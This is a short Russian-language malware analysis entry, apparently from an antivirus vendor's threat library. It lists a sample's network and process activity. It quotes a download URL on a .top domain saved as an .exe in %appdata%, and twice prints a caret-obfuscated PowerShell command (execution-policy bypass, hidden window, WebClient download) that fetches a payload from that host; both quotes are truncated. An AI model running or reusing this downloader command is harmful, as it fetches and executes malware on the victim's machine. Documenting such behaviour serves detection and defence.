Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OWEr^ShELL^.^E^xe -e^XEc^uti^oNp^O^lIc^Y bY^PASs -NOPrOFIlE^ ^-^win^d^o^w^stYle^ h^IdDen^ (N^Ew-^O^b^JE^C^t ^sYS^Tem.n^Et^.W^e^Bcl^I^E^Nt^)^.^doW^NL^O^a^DfIlE('http://toagoores.t...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /C "P^OWEr^ShELL^.^E^xe -e^XEc^uti^oNp^O^lIc^Y bY^PASs -NOPrOFIlE^ ^-^win^d^o^w^stYle^ h^IdDen^ (N^Ew-^O^b^JE^C^t ^sYS^Tem.n^Et^.W^e^Bcl^I^E^Nt^)^.^doW^NL^O^a^DfIlE('http://toagoores.t...' (со скрытым окном)